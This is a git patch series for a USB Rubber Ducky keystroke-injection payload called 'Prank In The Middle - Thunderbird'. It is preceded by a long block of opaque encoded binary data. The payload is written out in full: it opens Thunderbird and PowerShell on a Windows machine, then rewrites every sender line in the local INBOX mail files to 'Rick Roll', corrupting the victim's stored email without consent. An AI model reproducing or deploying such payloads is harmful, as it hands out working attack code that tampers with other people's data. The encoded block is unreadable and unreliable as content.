zkDF{kd9A{K_UCG)?BT~Ww->AN53Av$;Gcfr()vp(`Il!kQ*ae0>3^R_GlRyylv`;?eJ+lM1m-GJeRb79R;v(;uV2!0^*OxMKOg z?Af_J%zwQJaTkAcT6kaXSM%j0Qu-3`Df(z*k6I5u^7JUu2j)*zoO6GHX{=q;i`o#7JiFL zu(3}zA5Rd`X|5yzoy3+CbKR3!{J-{*Yc`MT&dCU8NPa&-y%wIOg=~+b`+gz&O>X*T znPH*7(FSDsLa9q#xRs>5=Inz}94h^WxTl>=&U$J9=jIokD}uhj%{TSV$cy0w6nAIV zjOUFWL^vBZV&}P{2NS-wkN1zK`qeY!;_j1-1wkBIS^h2oaSGjU-2@J&WP;wdZ{`+o zWellxE`vUbLR2sAe`=Q9$0xLj45sO@S==3Cli}I?675?-mHc(_$Zxv>l%=<)R@UtY~QbC|HxSy);UZ+iX4H=Xoczdb+i1?&(DIrZT( z$L%y4Y#M0lCw-7zdf%(*yo0v^QG+kj>?N+ua_`+rP0i-T-!0oT zC(9B4r0O*%fHYW8(LL_3DlNVyCerur&U7_b$-g6_!0}5O3t%TIFCceK{I>G`NbriM z{>t@i1R7d$&IpRk@AaE;Y&D^#CwR`mDM_MUwJ=mrqf!}x!j=V9Z*n- zjyipV%Phg>TQKRcSJY`RcQVC7IuTxjyfmIt|F3wEXuE`yxu@X6gddw8E51PSlT`DP zv3$FgK*DYmnV!lS07e-Vx58H$V<}&N>wL}ifDNc7r)ifQ!&(seMK|&yV4hgydv5wk z6SkxqaKI{x%Xm|4i(Nv&>&9gWK0k}NhD9HwnV8ini?m<6SDF@=`YG3^g=ePwQlOpW ztYgm|c7=)~;1n+|y!kRN-lXTo#l86hYwhj|Kk@gVQ!J0^oq0v1zpx&`x?izUx@9n3 zXLTlugAlc_MDZANR^XW!J6E9LdfqC}53M`ktS?@-ezMbYo~3B*AP&kBz0>%XTO^Qb zla85L>+X7OdBJa86Bl8xOw5Pbt(ye-r`s!PH<)|CKRW1^IXKu={DOURyilXR^NGb; zx~t=h@0cg{S$u^3e~xR1=Z%exhY;??rA~sa6Oir#I;Q9dutkuO>(6y^$%z?VRjoc1 zO8s$}VFWA;UgX(e1b+v|^r@rBO5t@|FhzFI=(mUR1&#S2ce+_51CwzuNo4Xjak6HQ zS3Zjeh;2QS=p*#qTJ4UjqG0T2u|pxGhxwqIpfQpnn&!= z{GKd^P4B!rO za(vS7J~Mc4k42c=Vm}JAMF^%S=ZA<=Vf%P`?0;E+`d*<6kY&JQz3 zh&j;mRu-{k#oOn_!J5xmJeEI77E}z`pm$g#yRUYY_)G8tfHpP4uFAP?S_j}7pnY?+ zGg5DIXEg6=b=n9QHy$l`K`kAYe{@t)tgVWJ;w_9FAVVL34F|HCZvrKGZVqj;<9ve1 zP#dwBq*vq5S&4&aAW*2B%ai8Sod-(i#|ZKl=#jlp*%K_No$ zV+m8RhMW2fs@cwF<^lf*{&Whs{w_Jg!%C6=fwfK%1NAT7*+M(iHL-T0^>t=cihG(h zaCAVS@;Wnuz2}?>R1@PST)1IDbsB@<`mPqmKWbg_hmc2zMIOXhii(0(z4zbwgZ%g~ zI+gq*6{VeDneFSaI~F|cSQKy8r2D!t_F8hd#904pBqaDwDbI+Iq5iIZ0aBKh#Ids7*d* z8>vQEgX0w&;$_woLh;+BzvAxKDbC+F*pf>SeS{tb`Nv_t_+$F-d`?k}B894E*P^m_ z>8j3Eiz#Ne>Y<`qyTYyk#$EBlXJ*h;-erB?t8Fzu?uS+6DEUq?Oc7^4E5{3?-S&)u zvg1B?q5GP`KI2=jUDJnWO{k>zbzPyk9izrKQz-~N)O`u^{ucLEWJ-^0FeSR>am8^` z6qEbzG+*yftD3NjpTd6Yb$X3mf30KBaGNSdCtyqu{GVS7qmxxV17@>Kf%6{hf(X!PUl# zd8b0xCfxKy8PcEIxh$&x6Y>naxA6^K0OLk&M-*W~Qs(sZ8jP3nF#SUlWhwyfI>wHW4%+sn= z(drkH#gr@L)MtBrM$2(w2EBSL=CKxeB!BW)h%of1%1V}nhsS`N%TM$8q|E_+#Jj{7 z=#A7|SF)3f%l_2xgEm$#kr+pIlM-c|AGO?L$Bs{hwtdOUjyDD15?$%JLJfL=I-?4# zZ44!M)1PDZKa5pfSEd?Sn9e-*UYd$W^=tc<5CQX!3lU3EQ_~AdF^_zzg9*fm$IXSi z5W%E7=jst`n;qB#9?Uz18jaq%jw0I`E4ShKht$lS@~>aZ39Dy_=G?^r?1Rp4E5eZ` zg_B+1&XQXe=xJY`jMV#J!7TpgsKHoapbk#qJOfyW?%nN4cY;ee+fhM5LGS*&e}1kt z^yaLA?06&HZCi}V4T^+t0BAql4v;{4phaOTS(5%+)!3)B>=qhQ9QDm}lH436z<8_D z1PWE{*2ypD4<`GwBoBHPpv_1ctyQ*;md&iv^jH5tPt}hO~BI*4tX*`2(kn)9zb&eu}aG}*H4|VF<9Sy?IOlHcjQoD z*l9Akzcuh0CK$FX=7}>c`x;ohf}-q~?w9K>=Xj4rK#T9k4bVOTgxKsW{fqZXYO8K+ zuHb5d4dLI_lP-rp6%ZKAFHH@zrr=%bYeerVLIcU8f#H?S`!6gQ$O6RRc+z~+1=8OoOr@z>@L_I~ z+q!O5d+-KT^94?ecQILN=po^l1x4SRTU*V!BCZ%%?Z3ITX}+N&=_+TZpunOj1WED6 z@mEz4wj-^?FR0_pOg=f{dd|KWc3o5x5~@^D=$bm!MIg)jZDyMmFQ_YG!>qFEW6O~r zUvRT-cuaya&X^m6fPKCr%7@iC-)!;SHTpBl*GGt40vOq2^jPd?j*jLD$HziVf<$4W z0w|r9XBXdi>7jL7(E8On{A3$RSQII4zJ4mIk*HF3PY*?27ZyHM{@tTTwy@9_sK^(4 z;Iy#NK*QF6pB%DOm}lc3+>?KX-tsme{uFa{)MJb>4g?D6Xbw1dE~=#x1jP;@wL~^d z5Crv$UM{wF=d&h=&u2nj{w+oH$ZsbZkGz4AI{E`6eU>j7aP&C=No51*ENXq|4Bvkp z4hRfyB}!vkp6$-$`PuI+*?SPLVPIM5d%=0pm^~#=>4I0O7d0J-au~KSPO(kK(MELe z+ShYZ#TqtVT4wXQ&TGJ)>`a#pFw95km^3+jroZjE_WZNKzX2(`CfL$5Ypen-Kz_EG z&F7rKD`H=(S3-@l(^oxKHhc!J26@b|vxxtY0OrsgX`+eOC_^CG%Fb?~tMNs8#Oe0u zo0vSjlPbIvkiSkQ3Ho#F{Mb3~Zy2UtN1@7C7=+PH zzH9%PX8jLgCL^{yPqmn+85v-txsWGQ->2V?%0E$Q3j&vZKUcM&%FhanK?TfTf|G=2 z3yRlTMu7b$0c)3Z;G3l1h`YEhWAv^+GML;&>wpgH`e^s z>uzSYSDI0Cc6gI0Bzu-;9!Yl>V| z2f7S6>+28pZUm6<7z?XvoMi1w_M}%Z2(5_ta zDF90!Zj|F?_<-ufERulg^7jt_S_02nV>X)q9}2)8y8t3r41G2iJA3#9uhsAJU)oX!_53 z6|K-$)wl!XowUMr6t3YCMyY#lGEy756h@}piqevv`?Pc& zFKIB{ml~R2--LNA;g|iNOKw-ocd+kXH(bs&z^vNnF(aC2!Ba5Ed>4_7yKG`~R8s7hm7Y-+yxDBRY(VIR!Xl*vY!9CFGSb!cB*YMf6rcesJ*)E8REb4dQ z0Czc`2zZz0f1Rt8dUD?X1*56uO_a~E%cI|9bnIE#4l&f(g_leS;|VL6w#9Q_#K0AO z0;gN`o8k_4DViNG(*<3wQWZy}58Ii$vg7hIvj*=Xc6IP*=SkSvVsUH+ocUo6_4Unb zKhj-w(YlHSsGfdIk4?&dAC`6I#L;ZQ!D>K#f_dHQyT0~1DWl7GtVR9l;*GG%p7r22 z{+~C;{kC(B)ir)d5^ak`2A8sCh9E zj2c$l58v?E5JA1&djbMQ~(H?-(}%f z+$Va*ny-=l((%{D*`7G8Wo|C*_+nL~$Q?L+`p#5uhXg7A37Ft#=s9tmt(G6F8C7+T z5%IIFV>wo%O?)PfIH$J3${)>>vUhpuRt7>pK8Wy~*O$3=33$d`)~2D-y|Zmd*?qw0 zAC*9E1x~bbVD`SIF^9=ir@a_$yKgIEOeBpi)1F7pw*bsQe-{0jf@MOr{IjX8^~tER zU$`dq#wufzJD_t_cH`d_14}LVtG312OPLMa23{#;XIMdiY^rAAVaRO~gECa2FVR6K zw6Ux$w^Xyh9ng&OeC&lwoDqgyTI+YR@NUmq+$yX^VbGJ0Sgpi(b3^*$u zR!(Zz6oi|OBo-P|YQ@$97be|A1y`1h_%F11^D& z+xK36NEDXSo@h`(G{6J{XIL8N-ZrdbbRB=vhezkSFznV4RDQLdp%)siA#CseB)*s- zH-ARFYx0GJRlTSU5I&M3=&o|8B3M+T^(a#T7^-Ek4#oLtZCLLN3Fx{wcC2ln%r;6H zB6k`tc1lZh2@t*FY^H-L>Z9T`g zL!m{)*cB%rNZq~|zB(bcI(?NkdxG$TQ}CSk>i2i6fEy(iTURB=6x4WbYWGGiv+EDB z)5&nUkShCs_(xCE`G+!t%WvDb2(_H)MFw$2e;&BM|B9{y!&eEYc_CrlC%4Cq&qv3% zvgtK9-cYw!sjYrAEvR&2wwkLp&^lPuKcQ+Q_9-vo^(QF3{aK;~o7qX#>F!$_^;+jX zZzpb*@k0!LlTzl;BSZ@K>KCJkR#V%`NNc)YLW=!010@Ue8PA_9J?&R`zT(+_btON3 zHkvNx*`%xQny`553Ox!wjoY1XHW?-sisK*f-~XwSCN4r3FY}Zs*Q;>sC6{E*j}k{! zN3(k8@)41NV)c^m>l1n&_kmKSDmM;aUhdSg%h9S|FY7k!9V^Awz2BhZ`?EEwn%^~6 zOHDa<@HA8e$JjGEbGAp#zmZ5!Ge$7V#I<)sCx{I<{Z%M+#XGQHNOY{$hwti5RyinKBPD}7SOyM;L*G9YA*Z7pDr z8a>0n%vCG-5SK6t>scLgK`W_|_2{@hn2v z!!^F=y|~}$maimt1OaUV5c}U^j}~7wF(L4?G{MNA#nrIyA>8_{KotR^Khl6`f0~f< zPE7E>u!^G;@F;Lwe5q|{$Y621W1uUh&ED77x4t!Ma}3i#xP-p}vJC{gHr>?o2I8AG z$yT%!*N9A<2hXHXa-Lgi&c*2-Zbz-xyi&B%oLe}gSpm4c-C}E?qu-xMVt#vdRDXb< z72!(HRjJj88?jo7;zh$r6UPJ!{(!rw=Fs4JKwuF7w|~0+Gkw7v7H`Y^fXq}#|EH?< zf68wEE?};GwmmxM*Qb^XmM7XM1})uAlMOZNJ4`?xO|3=aurK zH&L`Lf1=ji>4LbxZ96{UD>Tz}Y{XUs}aa#9EFFH@N&q^R>R%pbT z{G0UQ!M9GzjP2^Wa6oN2kcx+F$h+Ov2*#mK{bv0*5>@gy_6Gnvlw*p(LCtEgz@yG5 zhzEU!$r0BbI=X+h&8q?0UxJ6qdz?^S{KUsNobqsEZ7%1INfh$?1rQg$ zb)-Q(#^sSXFbUqBuEatgn6d~Ce05sEMA4-d@~?e8t8N;;V&axr6sA+#P4UIs8S`hz zFUnBeQ1YBIp68S;7<`8%(#?2B=z^bFO=qaRwXKg`4G_?q;Xfelg@t zzN1|kbbHlX8GP$x)c7vvbbDM8>?PU5-gPJNH!I0e9B8*)Bb#@ed8HjM5qJUUJq?R5 z^K3&`zBHqVr23z6K}9^3#BCtZ;=D-~3_L#ceSv{(-msy?&vhel&)fK4;2 zt|is_WWbto(z9YZ>w{SDy9GM|O|O&Jwh}`F0YUE!!p&D4#(xysll{wB9M0bohjJZ% zObB)s^4@RJzwFuaRUqVhWOITk&WmR6WJ#Ox(&{5=T*ahLOvnYWRLP98pLjuk72jBp z(i4v3IAWCa%U={D&uKE^@eBzYzQ?wblR^x3kJ_w7?D|OW zS_B?Qo_OSyeO7a#fc;RQul6tuj>cOc#0_%rK}=PG zwel4BT>kc(`F_wAj*SG&3Ztm)a?ouJIb{I`F!tQ?=^#g1f3QC)0vrC z`-y;?L>j+jHSCl@`jKA}zi#aMQOigOSNTi@qAw(p9xI>!yEtG468GjYn2ppQN zr(>$?xu3bU+pFsBDf;Qfy Date: Tue, 4 Jun 2024 07:39:16 +0200 Subject: [PATCH 3/4] Update payload.txt --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 0af6ef7..0a9903d 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -37,7 +37,7 @@ EXTENSION DETECT_READY END_EXTENSION REM Open Thunderbird and goto settings -WIN r +GUI r STRING thunderbird ENTER DELAY 1000 @@ -59,7 +59,7 @@ DELAY 500 REM Copy the directory path REPEAT 4 TAB DELAY 500 -SPACEBAR +SPACE DELAY 500 ENTER DELAY 500 @@ -69,7 +69,7 @@ ALT F4 DELAY 500 REM Open the powershell and goto the directory -WIN r +GUI r STRING powershell ENTER DELAY 1500 @@ -88,7 +88,7 @@ STRINGLN # Replace backslashes with slash $newPath = $dir.FullName -replace '\\', '/' - # Add the sub-string “/INBOX” to the end + # Add the sub-string '/INBOX' to the end $newPath += "/INBOX" # Check whether the INBOX file exists @@ -97,7 +97,7 @@ STRINGLN $emails = Get-Content -Path $newPath -Raw # Replace email sender with Rick Roll! - # The following operation is simplified and assumes that the sender starts with “From: ...” + # The following operation is simplified and assumes that the sender starts with 'From: ...' # and does not contain complex MIME structures $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " From 255713357b91876eb8191a8d77fa6668204a6642 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 10:03:22 +0200 Subject: [PATCH 4/4] [+] STRINGLN_POWERSHELL --- .../Prank_In_The_Middle_Thunderbird/payload.txt | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 0a9903d..3712631 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -1,11 +1,11 @@ REM ##################################################### -REM # # +REM # # REM # Title : Prank In The Middle - Thunderbird # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : Prank # -REM # Target : Windows 10/11 # -REM # # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Prank # +REM # Target : Windows 10/11 # +REM # # REM ##################################################### EXTENSION DETECT_READY @@ -81,7 +81,7 @@ ENTER DELAY 500 REM Get the INBOX content and edit it overwriting. Then close the powershell -STRINGLN +STRINGLN_POWERSHELL cd ImapMail $directories = Get-ChildItem -Directory | Select-Object FullName foreach ($dir in $directories) { @@ -107,4 +107,4 @@ STRINGLN } END_STRINGLN DELAY 1000 -ALT F4 \ No newline at end of file +ALT F4